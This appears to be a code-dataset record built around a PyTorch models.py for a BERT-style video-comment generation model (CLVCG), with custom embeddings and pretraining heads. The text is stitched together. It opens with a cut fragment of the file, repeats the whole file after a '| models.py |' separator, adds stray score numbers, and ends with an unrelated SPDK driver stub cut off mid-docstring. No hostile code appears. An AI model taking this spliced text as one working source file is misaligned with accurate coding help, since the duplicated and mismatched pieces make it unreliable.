#print("position_ids",position_ids[0,:])
input_ids = input_ids[:,self.visual.size()[1]+2:]
seq_length = input_shape[1]
if position_ids is None:
position_ids = self.position_ids[:, :seq_length]
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)
if inputs_embeds is None:
inputs_embeds = self.word_embeddings(input_ids)
self.video_time = self.video_time.unsqueeze( dim=1)
self.color = self.color.unsqueeze( dim=1)
inputs_embeds = torch.cat([self.visual,self.video_time,self.color,inputs_embeds], dim=1)
#visual_zeros = torch.zeros([self.visual.size()[0],self.visual.size()[1]+2], dtype=input_ids.dtype).to(torch.device("cuda"))
#position_embeddings = self.position_embeddings(torch.cat([visual_zeros,position_ids], dim=1))
#token_type_embeddings = self.token_type_embeddings(torch.cat([visual_zeros,token_type_ids], dim=1))
position_embeddings = self.position_embeddings(position_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = inputs_embeds + position_embeddings + token_type_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
#print("embeddings",embeddings[0,:])
return embeddings
class MLPWithLayerNorm(nn.Module):
def __init__(self, config, input_size):
super(MLPWithLayerNorm, self).__init__()
self.config = config
self.linear1 = nn.Linear(input_size, config.hidden_size)
self.non_lin1 = ACT2FN[config.hidden_act] if isinstance(config.hidden_act, str) else config.hidden_act
self.layer_norm1 = BertLayerNorm(config.hidden_size, eps=1e-12)
self.linear2 = nn.Linear(config.hidden_size, config.hidden_size)
self.non_lin2 = ACT2FN[config.hidden_act] if isinstance(config.hidden_act, str) else config.hidden_act
self.layer_norm2 = BertLayerNorm(config.hidden_size, eps=1e-12)
def forward(self, hidden):
return self.layer_norm2(self.non_lin2(self.linear2(self.layer_norm1(self.non_lin1(self.linear1(hidden))))))
class BertPairTargetPredictionHead(nn.Module):
def __init__(self, config):
super(BertPairTargetPredictionHead, self).__init__()
self.mlp_layer_norm = MLPWithLayerNorm(config, config.hidden_size * 3)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.bias = nn.Parameter(torch.zeros(config.vocab_size))
def forward(self, hidden_states, pairs):
bs, num_pairs, _ = pairs.size()
bs, seq_len, dim = hidden_states.size()
# pair indices: (bs, num_pairs)
left, here, right = pairs[:,:, 0], pairs[:, :, 1], pairs[:, :, 2]
# (bs, num_pairs, dim)
left_hidden = torch.gather(hidden_states, 1, left.unsqueeze(2).repeat(1, 1, dim))
# pair states: bs * num_pairs, max_targets, dim
#left_hidden = left_hidden.contiguous().view(bs * num_pairs, dim).unsqueeze(1)#.repeat(1, self.max_targets, 1)
here_hidden = torch.gather(hidden_states, 1, here.unsqueeze(2).repeat(1, 1, dim))
# bs * num_pairs, max_targets, dim
#here_hidden = here_hidden.contiguous().view(bs * num_pairs, dim).unsqueeze(1)#.repeat(1, self.max_targets, 1)
right_hidden = torch.gather(hidden_states, 1, right.unsqueeze(2).repeat(1, 1, dim))
# bs * num_pairs, max_targets, dim
#right_hidden = right_hidden.contiguous().view(bs * num_pairs, dim).unsqueeze(1)#.repeat(1, self.max_targets, 1)
#print(right_hidden)
# (max_targets, dim)
hidden_states = self.mlp_layer_norm(torch.cat((left_hidden, right_hidden, here_hidden), -1))
# target scores : bs * num_pairs, max_targets, vocab_size
target_scores = self.decoder(hidden_states) + self.bias
return target_scores
class BertPreTrainingHeads(nn.Module):
def __init__(self, config):
super(BertPreTrainingHeads, self).__init__()
self.predictions = BertLMPredictionHead(config)
self.pair_target_predictions = BertPairTargetPredictionHead(config)
def forward(self, sequence_output, pairs):
prediction_scores = self.predictions(sequence_output)
pair_target_scores = self.pair_target_predictions(sequence_output, pairs)
return prediction_scores, pair_target_scores
class BertPreTrainingHeads_WithoutPair(BertPreTrainingHeads):
def __init__(self, config):
super(BertPreTrainingHeads_WithoutPair, self).__init__(config)
self.pair_target_predictions = None
self.seq_relationship = nn.Linear(config.hidden_size, 2)
def forward(self, sequence_output, pooled_output):
prediction_scores = self.predictions(sequence_output)
seq_relationship_score = self.seq_relationship(pooled_output)
return prediction_scores, seq_relationship_score
class BertPreTrainingHeads_WithPos(BertPreTrainingHeads):
def __init__(self, config,model_cfg):
super(BertPreTrainingHeads_WithPos, self).__init__(config)
self.pair_target_predictions = None
self.pos_pred = nn.Linear(config.hidden_size, model_cfg.max_comment_len_CMLM)
def forward(self, sequence_output):
prediction_scores = self.predictions(sequence_output)
seq_pos_score = self.pos_pred(sequence_output)
return prediction_scores, seq_pos_score
class MyBertModel(BertModel):
def __init__(self, config,fix_mask=False,model_cfg=None):
super(MyBertModel, self).__init__(config)
self.embeddings = MyBertEmbeddings(config)
self.fix_mask = fix_mask
self.model_cfg = model_cfg
'''
def get_extended_attention_mask(self, attention_mask, input_shape: Tuple[int], device=None):
begin_pos = self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len
if self.fix_mask:
batch_size, seq_length = input_shape
#seq_ids = torch.arange(seq_length, device=device)
#causal_mask = seq_ids[None, None, :].repeat(batch_size, seq_length, 1) <= seq_ids[None, :, None]
causal_mask = torch.ones((batch_size,seq_length,seq_length), device=attention_mask.device)
causal_mask[:,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM,begin_pos+self.model_cfg.max_pos_len_CMLM:] = 0
causal_mask = causal_mask.to(attention_mask.dtype)
extended_attention_mask = causal_mask[:, None, :, :] * attention_mask[:, None, None, :]
else:
extended_attention_mask = attention_mask[:, None, None, :]
#print("extended_attention_mask",extended_attention_mask[0,0,begin_pos-1:begin_pos+self.model_cfg.max_pos_len_CMLM+1,begin_pos+self.model_cfg.max_pos_len_CMLM-1:])
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
extended_attention_mask = extended_attention_mask.to(dtype=self.dtype) # fp16 compatibility
extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
return extended_attention_mask
'''
class MyCLVCG(BertPreTrainedModel):
def __init__(self, model_cfg, type="pretrain", pad_token_id=0):
config = BertConfig(
vocab_size = model_cfg.vocab_size,
hidden_size = model_cfg.dim,
num_hidden_layers = model_cfg.layers,
num_attention_heads = model_cfg.n_heads,
intermediate_size = model_cfg.dim_ff,
hidden_dropout_prob = model_cfg.p_drop_hidden,
attention_probs_dropout_prob = model_cfg.p_drop_attn,
max_position_embeddings = model_cfg.max_len,
pad_token_id=pad_token_id,
type_vocab_size = 100
)
super(MyCLVCG, self).__init__(config)
self.config = config
self.type = type
self.model_cfg = model_cfg
self.bert = MyBertModel(config)
self.cls = BertPreTrainingHeads(config)
self.pad_token_id = pad_token_id
self.init_weights()
self.tie_weights()
self.vocab_weight = None
self.apply(self.inplace_gelu)
def inplace_gelu(self,m):
classname = m.__class__.__name__
if classname.find('GeLU') != -1:
m.inplace=True
def tie_weights(self):
""" Make sure we are sharing the input and output embeddings.
Export to TorchScript can't handle parameter sharing so we are cloning them instead.
"""
self._tie_or_clone_weights(self.cls.predictions.decoder,
self.bert.embeddings.word_embeddings)
def forward(self,input_ids, attention_mask, position_ids, segment_ids, masked_lm_labels, visual, color, video_time, pairs, pair_targets, head_mask=None, is_training=True):
self.bert.embeddings.visual = visual
self.bert.embeddings.color = color
self.bert.embeddings.video_time = video_time
outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=segment_ids,
attention_mask=attention_mask, head_mask=head_mask)
sequence_output = outputs[0]
prediction_scores, pair_target_scores = self.cls(sequence_output, pairs)
if self.vocab_weight is None:
loss_fct = nn.CrossEntropyLoss(ignore_index=-1,reduction='none')
else:
loss_fct = nn.CrossEntropyLoss(ignore_index=-1,reduction='none', weight=self.vocab_weight)
if masked_lm_labels is not None:
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
ntokens = torch.sum(torch.ne(masked_lm_labels,-1))
masked_lm_loss = torch.sum(masked_lm_loss)/ntokens
# SBO loss
pair_loss = loss_fct(
pair_target_scores.view(-1, self.config.vocab_size),
pair_targets.view(-1)
)
pair_loss = torch.sum(pair_loss)/ntokens
loss = masked_lm_loss + self.model_cfg.pair_loss_weight * pair_loss
return loss, prediction_scores, pair_target_scores #, outputs[2:]
class MyCLVCG_POINTER(MyCLVCG):
def __init__(self, model_cfg, type="pretrain", pad_token_id=0):
config = BertConfig(
vocab_size = model_cfg.vocab_size,
hidden_size = model_cfg.dim,
num_hidden_layers = model_cfg.layers,
num_attention_heads = model_cfg.n_heads,
intermediate_size = model_cfg.dim_ff,
hidden_dropout_prob = model_cfg.p_drop_hidden,
attention_probs_dropout_prob = model_cfg.p_drop_attn,
max_position_embeddings = model_cfg.max_len,
pad_token_id=pad_token_id,
type_vocab_size = 100
)
super(MyCLVCG_POINTER, self).__init__(model_cfg)
self.cls = BertPreTrainingHeads_WithoutPair(config)
self.tie_weights()
def forward(self,input_ids, attention_mask, position_ids, segment_ids, masked_lm_labels, visual, color, video_time, next_sentence_label = None, head_mask=None, is_training=True):
self.bert.embeddings.visual = visual
self.bert.embeddings.color = color
self.bert.embeddings.video_time = video_time
#print(input_ids[:,self.model_cfg.max_context_len])
outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=segment_ids,
attention_mask=attention_mask, head_mask=head_mask)
sequence_output = outputs[0]
cls_output = sequence_output[:,self.model_cfg.max_context_len]
prediction_scores, seq_relationship_score = self.cls(sequence_output, cls_output)
loss_fct = nn.CrossEntropyLoss(ignore_index=-1)
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
total_loss = masked_lm_loss
next_sentence_loss = torch.LongTensor(0).to(total_loss.device)
if next_sentence_label is not None:
#print(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))
next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))
total_loss += self.model_cfg.next_sentence_loss_weight * next_sentence_loss
#print(next_sentence_loss)
return total_loss, self.model_cfg.next_sentence_loss_weight * next_sentence_loss, prediction_scores, seq_relationship_score
class MyCLVCG_CMLM(MyCLVCG):
def __init__(self, model_cfg, type="pretrain", pad_token_id=0):
config = BertConfig(
vocab_size = model_cfg.vocab_size,
hidden_size = model_cfg.dim,
num_hidden_layers = model_cfg.layers,
num_attention_heads = model_cfg.n_heads,
intermediate_size = model_cfg.dim_ff,
hidden_dropout_prob = model_cfg.p_drop_hidden,
attention_probs_dropout_prob = model_cfg.p_drop_attn,
max_position_embeddings = model_cfg.max_len,
pad_token_id=pad_token_id,
type_vocab_size = 100,
)
super(MyCLVCG_CMLM, self).__init__(model_cfg)
self.bert = MyBertModel(config,fix_mask=True,model_cfg=model_cfg)
self.cls = BertPreTrainingHeads_WithPos(config,model_cfg)
self.tie_weights()
def forward(self,input_ids, attention_mask, position_ids, segment_ids, masked_lm_labels, visual=None, color=None, video_time=None, pos_labels = None, head_mask=None, is_training=True):
'''
begin_pos = self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len + self.model_cfg.max_pos_len_CMLM
print("input_ids0",input_ids[0,begin_pos:])
print("input_ids1",input_ids[1,begin_pos:])
print("input_ids0",input_ids[0,self.model_cfg.max_n_clips + 2:])
print("input_ids1",input_ids[1,self.model_cfg.max_n_clips + 2:])
print("attention_mask",attention_mask[1,:])
print("position_ids",position_ids[1,:])
print("segment_ids",segment_ids[1,:])
print("visual",visual[1,:])
print("color",color[1,:])
print("video_time",video_time[1,:])
print("head_mask",head_mask)
print("masked_lm_labels",masked_lm_labels[1,self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len:])
print("pos_labels",pos_labels[1,self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len:])
'''
self.bert.embeddings.visual = visual
self.bert.embeddings.color = color
self.bert.embeddings.video_time = video_time
#print(input_ids[:,self.model_cfg.max_context_len])
outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=segment_ids,
attention_mask=attention_mask, head_mask=head_mask)
sequence_output = outputs[0]
prediction_scores, seq_pos_score = self.cls(sequence_output)
loss_fct = nn.CrossEntropyLoss(ignore_index=-1)
#print(prediction_scores.view(-1, self.config.vocab_size))
#print(masked_lm_labels.view(-1))
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
total_loss = masked_lm_loss
pos_loss = loss_fct(seq_pos_score.view(-1, self.model_cfg.max_comment_len_CMLM), pos_labels.view(-1))
total_loss += self.model_cfg.pos_loss_weight * pos_loss
begin_pos = self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len
'''
print("sequence_output",sequence_output[0,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM])
pos = seq_pos_score[:,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM]
print("pos_pred",pos.argmax(dim=2)[0])
print("pos_labels0",pos_labels[0,begin_pos:])
print("pos_labels1",pos_labels[1,begin_pos:])
print("masked_lm_labels0",masked_lm_labels[0,begin_pos:])
print("masked_lm_labels1",masked_lm_labels[1,begin_pos:])
print("\n\n")
os._exit(0)
'''
return total_loss, self.model_cfg.pos_loss_weight * pos_loss, prediction_scores, seq_pos_score[:,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM] | models.py | import torch
import torch.nn as nn
import torch.nn.functional as F
import os
import json
import random
from typing import NamedTuple, Optional, Iterable, Tuple
from transformers import BertModel, BertPreTrainedModel
from transformers.modeling_bert import BertLMPredictionHead, ACT2FN
from transformers.configuration_bert import BertConfig
from transformers.modeling_outputs import BaseModelOutputWithPooling
BertLayerNorm = nn.LayerNorm
class Config(NamedTuple):
"Configuration for BERT model"
vocab_size: int = 40443 # Size of Vocabulary
dim: int = 1024 # Dimension of Hidden Layer in Transformer Encoder
layers: int = 12 # Numher of Encoder Layers
n_heads: int = 8 # Numher of Heads in Multi-Headed Attention Layers
dim_ff: int = 768*4 # Dimension of Intermediate Layers in Positionwise Feedforward Net
p_drop_hidden: float = 0.3 # Probability of Dropout of various Hidden Layers
p_drop_attn: float = 0.3 # Probability of Dropout of Attention Layers
max_n_clips: int = 10 # Maximum video clips for each comment
max_comment_len: int = 56 # Maximun words for each comment
max_comment_len_CMLM: int = 50
max_pos_len_CMLM: int = 6
max_context_len: int = 128 # Maximum words for context comments
max_len : int = 196
pair_loss_weight : float = 1.0
next_sentence_loss_weight: float = 5
pos_loss_weight: float = 1
@classmethod
def load_from_json(cls, file):
return cls(**json.load(open(file, "r")))
class MyBertEmbeddings(nn.Module):
"""Construct the embeddings from word, position and token_type embeddings."""
def __init__(self, config):
super(MyBertEmbeddings, self).__init__()
self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
# position_ids (1, len position emb) is contiguous in memory and exported when serialized
self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
def forward(self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None):
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
#print("input_ids",input_ids[0,:])
#print("token_type_ids",token_type_ids[0,:])
#print("position_ids",position_ids[0,:])
input_ids = input_ids[:,self.visual.size()[1]+2:]
seq_length = input_shape[1]
if position_ids is None:
position_ids = self.position_ids[:, :seq_length]
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)
if inputs_embeds is None:
inputs_embeds = self.word_embeddings(input_ids)
self.video_time = self.video_time.unsqueeze( dim=1)
self.color = self.color.unsqueeze( dim=1)
inputs_embeds = torch.cat([self.visual,self.video_time,self.color,inputs_embeds], dim=1)
#visual_zeros = torch.zeros([self.visual.size()[0],self.visual.size()[1]+2], dtype=input_ids.dtype).to(torch.device("cuda"))
#position_embeddings = self.position_embeddings(torch.cat([visual_zeros,position_ids], dim=1))
#token_type_embeddings = self.token_type_embeddings(torch.cat([visual_zeros,token_type_ids], dim=1))
position_embeddings = self.position_embeddings(position_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = inputs_embeds + position_embeddings + token_type_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
#print("embeddings",embeddings[0,:])
return embeddings
class MLPWithLayerNorm(nn.Module):
def __init__(self, config, input_size):
super(MLPWithLayerNorm, self).__init__()
self.config = config
self.linear1 = nn.Linear(input_size, config.hidden_size)
self.non_lin1 = ACT2FN[config.hidden_act] if isinstance(config.hidden_act, str) else config.hidden_act
self.layer_norm1 = BertLayerNorm(config.hidden_size, eps=1e-12)
self.linear2 = nn.Linear(config.hidden_size, config.hidden_size)
self.non_lin2 = ACT2FN[config.hidden_act] if isinstance(config.hidden_act, str) else config.hidden_act
self.layer_norm2 = BertLayerNorm(config.hidden_size, eps=1e-12)
def forward(self, hidden):
return self.layer_norm2(self.non_lin2(self.linear2(self.layer_norm1(self.non_lin1(self.linear1(hidden))))))
class BertPairTargetPredictionHead(nn.Module):
def __init__(self, config):
super(BertPairTargetPredictionHead, self).__init__()
self.mlp_layer_norm = MLPWithLayerNorm(config, config.hidden_size * 3)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.bias = nn.Parameter(torch.zeros(config.vocab_size))
def forward(self, hidden_states, pairs):
bs, num_pairs, _ = pairs.size()
bs, seq_len, dim = hidden_states.size()
# pair indices: (bs, num_pairs)
left, here, right = pairs[:,:, 0], pairs[:, :, 1], pairs[:, :, 2]
# (bs, num_pairs, dim)
left_hidden = torch.gather(hidden_states, 1, left.unsqueeze(2).repeat(1, 1, dim))
# pair states: bs * num_pairs, max_targets, dim
#left_hidden = left_hidden.contiguous().view(bs * num_pairs, dim).unsqueeze(1)#.repeat(1, self.max_targets, 1)
here_hidden = torch.gather(hidden_states, 1, here.unsqueeze(2).repeat(1, 1, dim))
# bs * num_pairs, max_targets, dim
#here_hidden = here_hidden.contiguous().view(bs * num_pairs, dim).unsqueeze(1)#.repeat(1, self.max_targets, 1)
right_hidden = torch.gather(hidden_states, 1, right.unsqueeze(2).repeat(1, 1, dim))
# bs * num_pairs, max_targets, dim
#right_hidden = right_hidden.contiguous().view(bs * num_pairs, dim).unsqueeze(1)#.repeat(1, self.max_targets, 1)
#print(right_hidden)
# (max_targets, dim)
hidden_states = self.mlp_layer_norm(torch.cat((left_hidden, right_hidden, here_hidden), -1))
# target scores : bs * num_pairs, max_targets, vocab_size
target_scores = self.decoder(hidden_states) + self.bias
return target_scores
class BertPreTrainingHeads(nn.Module):
def __init__(self, config):
super(BertPreTrainingHeads, self).__init__()
self.predictions = BertLMPredictionHead(config)
self.pair_target_predictions = BertPairTargetPredictionHead(config)
def forward(self, sequence_output, pairs):
prediction_scores = self.predictions(sequence_output)
pair_target_scores = self.pair_target_predictions(sequence_output, pairs)
return prediction_scores, pair_target_scores
class BertPreTrainingHeads_WithoutPair(BertPreTrainingHeads):
def __init__(self, config):
super(BertPreTrainingHeads_WithoutPair, self).__init__(config)
self.pair_target_predictions = None
self.seq_relationship = nn.Linear(config.hidden_size, 2)
def forward(self, sequence_output, pooled_output):
prediction_scores = self.predictions(sequence_output)
seq_relationship_score = self.seq_relationship(pooled_output)
return prediction_scores, seq_relationship_score
class BertPreTrainingHeads_WithPos(BertPreTrainingHeads):
def __init__(self, config,model_cfg):
super(BertPreTrainingHeads_WithPos, self).__init__(config)
self.pair_target_predictions = None
self.pos_pred = nn.Linear(config.hidden_size, model_cfg.max_comment_len_CMLM)
def forward(self, sequence_output):
prediction_scores = self.predictions(sequence_output)
seq_pos_score = self.pos_pred(sequence_output)
return prediction_scores, seq_pos_score
class MyBertModel(BertModel):
def __init__(self, config,fix_mask=False,model_cfg=None):
super(MyBertModel, self).__init__(config)
self.embeddings = MyBertEmbeddings(config)
self.fix_mask = fix_mask
self.model_cfg = model_cfg
'''
def get_extended_attention_mask(self, attention_mask, input_shape: Tuple[int], device=None):
begin_pos = self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len
if self.fix_mask:
batch_size, seq_length = input_shape
#seq_ids = torch.arange(seq_length, device=device)
#causal_mask = seq_ids[None, None, :].repeat(batch_size, seq_length, 1) <= seq_ids[None, :, None]
causal_mask = torch.ones((batch_size,seq_length,seq_length), device=attention_mask.device)
causal_mask[:,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM,begin_pos+self.model_cfg.max_pos_len_CMLM:] = 0
causal_mask = causal_mask.to(attention_mask.dtype)
extended_attention_mask = causal_mask[:, None, :, :] * attention_mask[:, None, None, :]
else:
extended_attention_mask = attention_mask[:, None, None, :]
#print("extended_attention_mask",extended_attention_mask[0,0,begin_pos-1:begin_pos+self.model_cfg.max_pos_len_CMLM+1,begin_pos+self.model_cfg.max_pos_len_CMLM-1:])
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
extended_attention_mask = extended_attention_mask.to(dtype=self.dtype) # fp16 compatibility
extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
return extended_attention_mask
'''
class MyCLVCG(BertPreTrainedModel):
def __init__(self, model_cfg, type="pretrain", pad_token_id=0):
config = BertConfig(
vocab_size = model_cfg.vocab_size,
hidden_size = model_cfg.dim,
num_hidden_layers = model_cfg.layers,
num_attention_heads = model_cfg.n_heads,
intermediate_size = model_cfg.dim_ff,
hidden_dropout_prob = model_cfg.p_drop_hidden,
attention_probs_dropout_prob = model_cfg.p_drop_attn,
max_position_embeddings = model_cfg.max_len,
pad_token_id=pad_token_id,
type_vocab_size = 100
)
super(MyCLVCG, self).__init__(config)
self.config = config
self.type = type
self.model_cfg = model_cfg
self.bert = MyBertModel(config)
self.cls = BertPreTrainingHeads(config)
self.pad_token_id = pad_token_id
self.init_weights()
self.tie_weights()
self.vocab_weight = None
self.apply(self.inplace_gelu)
def inplace_gelu(self,m):
classname = m.__class__.__name__
if classname.find('GeLU') != -1:
m.inplace=True
def tie_weights(self):
""" Make sure we are sharing the input and output embeddings.
Export to TorchScript can't handle parameter sharing so we are cloning them instead.
"""
self._tie_or_clone_weights(self.cls.predictions.decoder,
self.bert.embeddings.word_embeddings)
def forward(self,input_ids, attention_mask, position_ids, segment_ids, masked_lm_labels, visual, color, video_time, pairs, pair_targets, head_mask=None, is_training=True):
self.bert.embeddings.visual = visual
self.bert.embeddings.color = color
self.bert.embeddings.video_time = video_time
outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=segment_ids,
attention_mask=attention_mask, head_mask=head_mask)
sequence_output = outputs[0]
prediction_scores, pair_target_scores = self.cls(sequence_output, pairs)
if self.vocab_weight is None:
loss_fct = nn.CrossEntropyLoss(ignore_index=-1,reduction='none')
else:
loss_fct = nn.CrossEntropyLoss(ignore_index=-1,reduction='none', weight=self.vocab_weight)
if masked_lm_labels is not None:
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
ntokens = torch.sum(torch.ne(masked_lm_labels,-1))
masked_lm_loss = torch.sum(masked_lm_loss)/ntokens
# SBO loss
pair_loss = loss_fct(
pair_target_scores.view(-1, self.config.vocab_size),
pair_targets.view(-1)
)
pair_loss = torch.sum(pair_loss)/ntokens
loss = masked_lm_loss + self.model_cfg.pair_loss_weight * pair_loss
return loss, prediction_scores, pair_target_scores #, outputs[2:]
class MyCLVCG_POINTER(MyCLVCG):
def __init__(self, model_cfg, type="pretrain", pad_token_id=0):
config = BertConfig(
vocab_size = model_cfg.vocab_size,
hidden_size = model_cfg.dim,
num_hidden_layers = model_cfg.layers,
num_attention_heads = model_cfg.n_heads,
intermediate_size = model_cfg.dim_ff,
hidden_dropout_prob = model_cfg.p_drop_hidden,
attention_probs_dropout_prob = model_cfg.p_drop_attn,
max_position_embeddings = model_cfg.max_len,
pad_token_id=pad_token_id,
type_vocab_size = 100
)
super(MyCLVCG_POINTER, self).__init__(model_cfg)
self.cls = BertPreTrainingHeads_WithoutPair(config)
self.tie_weights()
def forward(self,input_ids, attention_mask, position_ids, segment_ids, masked_lm_labels, visual, color, video_time, next_sentence_label = None, head_mask=None, is_training=True):
self.bert.embeddings.visual = visual
self.bert.embeddings.color = color
self.bert.embeddings.video_time = video_time
#print(input_ids[:,self.model_cfg.max_context_len])
outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=segment_ids,
attention_mask=attention_mask, head_mask=head_mask)
sequence_output = outputs[0]
cls_output = sequence_output[:,self.model_cfg.max_context_len]
prediction_scores, seq_relationship_score = self.cls(sequence_output, cls_output)
loss_fct = nn.CrossEntropyLoss(ignore_index=-1)
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
total_loss = masked_lm_loss
next_sentence_loss = torch.LongTensor(0).to(total_loss.device)
if next_sentence_label is not None:
#print(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))
next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))
total_loss += self.model_cfg.next_sentence_loss_weight * next_sentence_loss
#print(next_sentence_loss)
return total_loss, self.model_cfg.next_sentence_loss_weight * next_sentence_loss, prediction_scores, seq_relationship_score
class MyCLVCG_CMLM(MyCLVCG):
def __init__(self, model_cfg, type="pretrain", pad_token_id=0):
config = BertConfig(
vocab_size = model_cfg.vocab_size,
hidden_size = model_cfg.dim,
num_hidden_layers = model_cfg.layers,
num_attention_heads = model_cfg.n_heads,
intermediate_size = model_cfg.dim_ff,
hidden_dropout_prob = model_cfg.p_drop_hidden,
attention_probs_dropout_prob = model_cfg.p_drop_attn,
max_position_embeddings = model_cfg.max_len,
pad_token_id=pad_token_id,
type_vocab_size = 100,
)
super(MyCLVCG_CMLM, self).__init__(model_cfg)
self.bert = MyBertModel(config,fix_mask=True,model_cfg=model_cfg)
self.cls = BertPreTrainingHeads_WithPos(config,model_cfg)
self.tie_weights()
def forward(self,input_ids, attention_mask, position_ids, segment_ids, masked_lm_labels, visual=None, color=None, video_time=None, pos_labels = None, head_mask=None, is_training=True):
'''
begin_pos = self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len + self.model_cfg.max_pos_len_CMLM
print("input_ids0",input_ids[0,begin_pos:])
print("input_ids1",input_ids[1,begin_pos:])
print("input_ids0",input_ids[0,self.model_cfg.max_n_clips + 2:])
print("input_ids1",input_ids[1,self.model_cfg.max_n_clips + 2:])
print("attention_mask",attention_mask[1,:])
print("position_ids",position_ids[1,:])
print("segment_ids",segment_ids[1,:])
print("visual",visual[1,:])
print("color",color[1,:])
print("video_time",video_time[1,:])
print("head_mask",head_mask)
print("masked_lm_labels",masked_lm_labels[1,self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len:])
print("pos_labels",pos_labels[1,self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len:])
'''
self.bert.embeddings.visual = visual
self.bert.embeddings.color = color
self.bert.embeddings.video_time = video_time
#print(input_ids[:,self.model_cfg.max_context_len])
outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=segment_ids,
attention_mask=attention_mask, head_mask=head_mask)
sequence_output = outputs[0]
prediction_scores, seq_pos_score = self.cls(sequence_output)
loss_fct = nn.CrossEntropyLoss(ignore_index=-1)
#print(prediction_scores.view(-1, self.config.vocab_size))
#print(masked_lm_labels.view(-1))
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
total_loss = masked_lm_loss
pos_loss = loss_fct(seq_pos_score.view(-1, self.model_cfg.max_comment_len_CMLM), pos_labels.view(-1))
total_loss += self.model_cfg.pos_loss_weight * pos_loss
begin_pos = self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len
'''
print("sequence_output",sequence_output[0,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM])
pos = seq_pos_score[:,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM]
print("pos_pred",pos.argmax(dim=2)[0])
print("pos_labels0",pos_labels[0,begin_pos:])
print("pos_labels1",pos_labels[1,begin_pos:])
print("masked_lm_labels0",masked_lm_labels[0,begin_pos:])
print("masked_lm_labels1",masked_lm_labels[1,begin_pos:])
print("\n\n")
os._exit(0)
'''
return total_loss, self.model_cfg.pos_loss_weight * pos_loss, prediction_scores, seq_pos_score[:,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM] | 0.902625 | 0.271234 |
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
class SPDKDRIVER(object):
"""SPDKDRIVER
This is just a virtual SPDK drivers interface.
SPDK-based app server should implement their specific drivers.
"""
@classmethod
def create(cls, server, *args, **kwargs):
for subclass in cls.__subclasses__():
if server == subclass.SERVER:
return subclass(*args, **kwargs)
raise LookupError("Could not find the driver for server %s" % server)
def __init__(self, *args, **kwargs):
super(SPDKDRIVER, self).__init__()
def discover_accelerator(self):
"""Discover a backend accelerator
:return: accelerator list.
"""
raise NotImplementedError('Subclasses must implement this method.')
def install_accelerator(self, driver_id, driver_type):
"""install a backend accelerator
:param driver_id: driver id.
:param driver_type: driver type.
:raise: NotImplementedError.
"""
